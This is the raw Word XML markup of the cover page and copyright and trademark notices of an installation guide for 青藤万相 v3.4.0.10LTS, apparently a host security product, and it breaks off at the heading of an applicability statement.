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A44BB" w14:textId="6C6BE159" w:rsidR="00824F5A" w:rsidRPr="000449B2" w:rsidRDefault="00FA611F" w:rsidP="00824F5A">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:keepNext/>
        <w:rPr>
          <w:rFonts w:ascii="阿里巴巴普惠体 2.0 55 Regular" w:eastAsia="阿里巴巴普惠体 2.0 55 Regular" w:hAnsi="阿里巴巴普惠体 2.0 55 Regular" w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="536A81B1" wp14:editId="121BA8E5">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-591711</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-813216</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7596000" cy="10743460"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3" name="图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形 3"/>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596000" cy="10743460"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="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gridCol w:w="295"/>
      </w:tblGrid>
      <w:tr w:rsidR="005556E8" w:rsidRPr="000449B2" w14:paraId="60EB42FF" w14:textId="77777777" w:rsidTr="00FA611F">
        <w:trPr>
          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
          <w:trHeight w:val="1037"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9781" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F0D262F" w14:textId="0D14BB32" w:rsidR="005556E8" w:rsidRPr="000449B2" w:rsidRDefault="005556E8" w:rsidP="00824F5A">
            <w:pPr>
              <w:ind w:right="112"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="295" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="267E9372" w14:textId="77777777" w:rsidR="005556E8" w:rsidRPr="000449B2" w:rsidRDefault="005556E8" w:rsidP="00824F5A">
            <w:pPr>
              <w:ind w:right="112"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00824F5A" w:rsidRPr="000449B2" w14:paraId="68DEBD05" w14:textId="1B33E9DB" w:rsidTr="00FA611F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9781" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EE095C6" w14:textId="7C36111D" w:rsidR="00824F5A" w:rsidRPr="000449B2" w:rsidRDefault="00824F5A" w:rsidP="00824F5A">
            <w:pPr>
              <w:ind w:right="112"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="295" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="319F3C78" w14:textId="77777777" w:rsidR="00824F5A" w:rsidRPr="000449B2" w:rsidRDefault="00824F5A" w:rsidP="00824F5A">
            <w:pPr>
              <w:ind w:right="112"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00824F5A" w:rsidRPr="000449B2" w14:paraId="4370C814" w14:textId="44DF8D21" w:rsidTr="00964B15">
        <w:trPr>
          <w:trHeight w:val="1890"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9781" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44065ED4" w14:textId="025AB203" w:rsidR="00824F5A" w:rsidRPr="000449B2" w:rsidRDefault="00824F5A" w:rsidP="00824F5A">
            <w:pPr>
              <w:ind w:right="112"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="295" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F35F40B" w14:textId="77777777" w:rsidR="00824F5A" w:rsidRPr="000449B2" w:rsidRDefault="00824F5A" w:rsidP="007A7107">
            <w:pPr>
              <w:ind w:right="112"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00824F5A" w:rsidRPr="000449B2" w14:paraId="36ED951F" w14:textId="63E027A8" w:rsidTr="00964B15">
        <w:trPr>
          <w:trHeight w:val="1137"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9781" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58B871AB" w14:textId="7CF38D61" w:rsidR="00824F5A" w:rsidRPr="000449B2" w:rsidRDefault="00824F5A" w:rsidP="003614D1">
            <w:pPr>
              <w:ind w:right="112"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
                <w:color w:val="00A4C5"/>
                <w:sz w:val="72"/>
                <w:szCs w:val="72"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
                <w:color w:val="00A4C5"/>
                <w:sz w:val="72"/>
                <w:szCs w:val="72"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> DOCPROPERTY  产品名称  \* MERGEFORMAT </w:instrText>
            </w:r>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
                <w:color w:val="00A4C5"/>
                <w:sz w:val="72"/>
                <w:szCs w:val="72"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00090665">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
                <w:color w:val="00A4C5"/>
                <w:sz w:val="72"/>
                <w:szCs w:val="72"/>
              </w:rPr>
              <w:t>青藤万相</w:t>
            </w:r>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
                <w:color w:val="00A4C5"/>
                <w:sz w:val="72"/>
                <w:szCs w:val="72"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="295" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="295E33D2" w14:textId="77777777" w:rsidR="00824F5A" w:rsidRPr="000449B2" w:rsidRDefault="00824F5A" w:rsidP="00824F5A">
            <w:pPr>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:color w:val="00A4C5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003614D1" w:rsidRPr="00964B15" w14:paraId="2A1C8BF7" w14:textId="77777777" w:rsidTr="00964B15">
        <w:trPr>
          <w:trHeight w:val="1147"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9781" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C317519" w14:textId="251B251E" w:rsidR="003614D1" w:rsidRPr="00964B15" w:rsidRDefault="003614D1" w:rsidP="009807A8">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="atLeast"/>
              <w:ind w:right="113"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
                <w:color w:val="00A4C5"/>
                <w:sz w:val="84"/>
                <w:szCs w:val="84"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00964B15">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
                <w:sz w:val="84"/>
                <w:szCs w:val="84"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00964B15">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
                <w:sz w:val="84"/>
                <w:szCs w:val="84"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> DOCPROPERTY  手册名称  \* MERGEFORMAT </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00964B15">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
                <w:sz w:val="84"/>
                <w:szCs w:val="84"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00090665">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
                <w:sz w:val="84"/>
                <w:szCs w:val="84"/>
              </w:rPr>
              <w:t>安装指导书</w:t>
            </w:r>
            <w:r w:rsidRPr="00964B15">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
                <w:sz w:val="84"/>
                <w:szCs w:val="84"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="295" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40662815" w14:textId="77777777" w:rsidR="003614D1" w:rsidRPr="00964B15" w:rsidRDefault="003614D1" w:rsidP="00824F5A">
            <w:pPr>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:color w:val="00A4C5"/>
                <w:sz w:val="84"/>
                <w:szCs w:val="84"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003614D1" w:rsidRPr="000449B2" w14:paraId="79253267" w14:textId="77777777" w:rsidTr="00FA611F">
        <w:trPr>
          <w:trHeight w:val="986"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9781" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CEBC14B" w14:textId="497ADC9A" w:rsidR="003614D1" w:rsidRPr="000449B2" w:rsidRDefault="003614D1" w:rsidP="00824F5A">
            <w:pPr>
              <w:ind w:right="112"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
                <w:color w:val="00A4C5"/>
                <w:sz w:val="72"/>
                <w:szCs w:val="72"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> DOCPROPERTY  版本号  \* MERGEFORMAT </w:instrText>
            </w:r>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00090665">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t>v3.4.0.10LTS</w:t>
            </w:r>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="295" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B633CEE" w14:textId="77777777" w:rsidR="003614D1" w:rsidRPr="000449B2" w:rsidRDefault="003614D1" w:rsidP="00824F5A">
            <w:pPr>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:color w:val="00A4C5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E2545" w:rsidRPr="000449B2" w14:paraId="379240C0" w14:textId="77777777" w:rsidTr="00964B15">
        <w:trPr>
          <w:trHeight w:val="5126"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9781" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7ABD357B" w14:textId="4B60409F" w:rsidR="009E2545" w:rsidRPr="000449B2" w:rsidRDefault="009E2545" w:rsidP="00824F5A">
            <w:pPr>
              <w:ind w:right="112"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="295" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47B9A240" w14:textId="77777777" w:rsidR="009E2545" w:rsidRPr="000449B2" w:rsidRDefault="009E2545" w:rsidP="00824F5A">
            <w:pPr>
              <w:spacing w:line="60" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:caps/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00824F5A" w:rsidRPr="000449B2" w14:paraId="2CAB2E53" w14:textId="2087923B" w:rsidTr="00FA611F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9781" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49A289AA" w14:textId="7CA60B65" w:rsidR="00824F5A" w:rsidRPr="000449B2" w:rsidRDefault="002D42B1" w:rsidP="00824F5A">
            <w:pPr>
              <w:ind w:right="112"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D42B1">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular" w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>让主机稳定又安全</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FA15E4B" w14:textId="56402614" w:rsidR="00824F5A" w:rsidRPr="000449B2" w:rsidRDefault="00824F5A" w:rsidP="009E2545">
            <w:pPr>
              <w:ind w:right="112"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> DOCPROPERTY  日期  \* MERGEFORMAT </w:instrText>
            </w:r>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00090665">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2022.04</w:t>
            </w:r>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="295" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C019E5B" w14:textId="77777777" w:rsidR="00824F5A" w:rsidRPr="000449B2" w:rsidRDefault="00824F5A" w:rsidP="00824F5A">
            <w:pPr>
              <w:spacing w:line="60" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:caps/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5FEC09A4" w14:textId="3DBE09FC" w:rsidR="007955E6" w:rsidRPr="000449B2" w:rsidRDefault="007955E6" w:rsidP="005556E8">
      <w:pPr>
        <w:ind w:right="112"/>
        <w:rPr>
          <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79D56D66" w14:textId="55237CC8" w:rsidR="00FB10C9" w:rsidRPr="000449B2" w:rsidRDefault="00FB10C9" w:rsidP="00FB10C9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
        </w:rPr>
        <w:sectPr w:rsidR="00FB10C9" w:rsidRPr="000449B2" w:rsidSect="004F7A51">
          <w:headerReference w:type="even" r:id="rId10"/>
          <w:headerReference w:type="default" r:id="rId11"/>
          <w:footerReference w:type="even" r:id="rId12"/>
          <w:headerReference w:type="first" r:id="rId13"/>
          <w:footerReference w:type="first" r:id="rId14"/>
          <w:pgSz w:w="11900" w:h="16840"/>
          <w:pgMar w:top="907" w:right="907" w:bottom="907" w:left="907" w:header="851" w:footer="992" w:gutter="0"/>
          <w:cols w:space="425"/>
          <w:docGrid w:type="lines" w:linePitch="423"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="10065" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10065"/>
      </w:tblGrid>
      <w:tr w:rsidR="007955E6" w:rsidRPr="000449B2" w14:paraId="0BBB391D" w14:textId="77777777" w:rsidTr="009A7E12">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10065" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51FDABF8" w14:textId="77777777" w:rsidR="007955E6" w:rsidRPr="000449B2" w:rsidRDefault="007955E6" w:rsidP="00A01BE9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular" w:hint="eastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>■ 版权声明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007955E6" w:rsidRPr="000449B2" w14:paraId="7148DD29" w14:textId="77777777" w:rsidTr="009A7E12">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10065" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="288AD638" w14:textId="77777777" w:rsidR="007955E6" w:rsidRPr="000449B2" w:rsidRDefault="007955E6" w:rsidP="00A01BE9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>本文中出现的任何文字叙述、文档格式、插图、照片、方法、过程等内容，除另有特别注明，版权均属</w:t>
            </w:r>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular" w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>青藤</w:t>
            </w:r>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:b/>
              </w:rPr>
              <w:t>云安全</w:t>
            </w:r>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所有，受到有关产权及版权法保护。任何个人、机构未经</w:t>
            </w:r>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular" w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>青藤</w:t>
            </w:r>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:b/>
              </w:rPr>
              <w:t>云安全</w:t>
            </w:r>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的书面授权许可，不得以任何方式复制或引用本文的任何片断。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004A5D6D" w:rsidRPr="000449B2" w14:paraId="1DCE29BB" w14:textId="77777777" w:rsidTr="009A7E12">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10065" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F990E81" w14:textId="61E994CA" w:rsidR="004A5D6D" w:rsidRPr="000449B2" w:rsidRDefault="004A5D6D" w:rsidP="00A01BE9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>■ 商标声明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004A5D6D" w:rsidRPr="000449B2" w14:paraId="38C87990" w14:textId="77777777" w:rsidTr="009A7E12">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10065" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0923ADA0" w14:textId="5BE29EBD" w:rsidR="004A5D6D" w:rsidRPr="000449B2" w:rsidRDefault="00090665" w:rsidP="00E80B22">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular" w:hint="eastAsia"/>
                <w:noProof/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FF0AF46" wp14:editId="6E3C1734">
                  <wp:extent cx="648000" cy="162367"/>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8000" cy="162367"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r w:rsidR="00A01BE9" w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>和其他</w:t>
            </w:r>
            <w:r w:rsidR="00A01BE9" w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular" w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>青藤</w:t>
            </w:r>
            <w:r w:rsidR="00A01BE9" w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>商标均为</w:t>
            </w:r>
            <w:r w:rsidR="00A01BE9" w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular" w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>青藤</w:t>
            </w:r>
            <w:r w:rsidR="00A01BE9" w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:b/>
              </w:rPr>
              <w:t>云安全</w:t>
            </w:r>
            <w:r w:rsidR="00A01BE9" w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>的商标。本文档提及的其他所有商标或注册商标，由各自的所有人拥有。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009807A8" w:rsidRPr="000449B2" w14:paraId="2F9194F4" w14:textId="77777777" w:rsidTr="009807A8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10065" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2ECDFDE2" w14:textId="77777777" w:rsidR="009807A8" w:rsidRPr="000449B2" w:rsidRDefault="009807A8" w:rsidP="00AE5EA2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular" w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>■ 适用性声明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
